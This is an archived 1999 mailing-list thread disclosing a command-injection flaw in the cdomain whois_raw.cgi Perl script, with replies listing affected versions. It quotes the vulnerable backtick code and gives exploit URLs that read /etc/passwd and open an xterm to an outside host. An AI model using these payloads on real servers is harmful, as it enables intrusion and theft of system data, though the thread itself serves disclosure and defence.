whois_rawcgi.txt

`Date: Tue, 1 Jun 1999 00:34:51 +0200  
From: Salvatore Sanfilippo -antirez- <[email protected]>  
To: [email protected]  
Subject: whois_raw.cgi problem  
  
Hi,  
  
sorry if this has already been known.  
  
There is a problem in whois_raw.cgi, called from  
whois.cgi. whois_raw.cgi is part of cdomain v1.0.  
I don't know if new versions are vulnerable.  
  
#!/usr/bin/perl  
#  
# whois_raw.cgi Written by J. Allen Hatch ([email protected])  
# 04/17/97  
#  
# This script is part of the cdomain v1.0 package which is available at:  
# http://www.your-site.com/~zone/whois.html  
  
...  
  
require ("/usr/lib/perl5/cgi-lib.pl");  
  
...  
  
$fqdn = $in{'fqdn'};  
# Fetch the root name and concatenate  
# Fire off whois  
if ($in{'root'} eq "it") {  
@result=`$whois_cmd_it $fqdn`;  
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {  
@result="Dettagli non disponibili per il dominio richiesto.";  
} else {  
@result=`$whois_cmd $fqdn`;  
}  
  
...  
  
  
The exploit is banal and well known problem:  
  
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd  
  
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0  
  
bye,  
antirez  
  
--  
Salvatore Sanfilippo antirez | [email protected] | [email protected]  
try hping: http://www.kyuzz.org/antirez [email protected]  
'se la barca non ce l'hai dove uzba te ne vai?  
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)  
  
---------------------------------------------------------------------------------  
  
Date: Wed, 2 Jun 1999 00:16:42 +0200  
From: Peter van Dijk <[email protected]>  
To: [email protected]  
Subject: Re: whois_raw.cgi problem  
  
On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:  
> Hi,  
>  
> sorry if this has already been known.  
>  
> There is a problem in whois_raw.cgi, called from  
> whois.cgi. whois_raw.cgi is part of cdomain v1.0.  
> I don't know if new versions are vulnerable.  
  
Version 2.0 is just as vulnerable.  
  
The commercial version (the one that runs on NT too :) is _not_ vulnerable  
since it does it's own socket thing instead of starting 'whois'.  
  
I've known of this bug in cdomain for about 6 months but never got around  
to writing up an advisory...  
  
Greetz, Peter  
--  
| 'He broke my heart, | Peter van Dijk |  
I broke his neck' | [email protected] |  
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |  
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |  
  
---------------------------------------------------------------------------------  
  
Date: Wed, 2 Jun 1999 01:06:22 +0200  
From: Peter van Dijk <[email protected]>  
To: [email protected]  
Subject: Re: whois_raw.cgi problem  
  
On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:  
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:  
> > Hi,  
> >  
> > sorry if this has already been known.  
> >  
> > There is a problem in whois_raw.cgi, called from  
> > whois.cgi. whois_raw.cgi is part of cdomain v1.0.  
> > I don't know if new versions are vulnerable.  
>  
> Version 2.0 is just as vulnerable.  
>  
> The commercial version (the one that runs on NT too :) is _not_ vulnerable  
> since it does it's own socket thing instead of starting 'whois'.  
>  
> I've known of this bug in cdomain for about 6 months but never got around  
> to writing up an advisory...  
  
To elaborate this a bit further: cdomain-free 2.4 and lower are  
_vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've  
seen are _not_ vulnerable, because they connect to the whois servers  
themselves.  
  
cdomain-free is available for download at www.cdomain.com.  
  
Greetz, Peter  
--  
| 'He broke my heart, | Peter van Dijk |  
I broke his neck' | [email protected] |  
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |  
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |  
  
`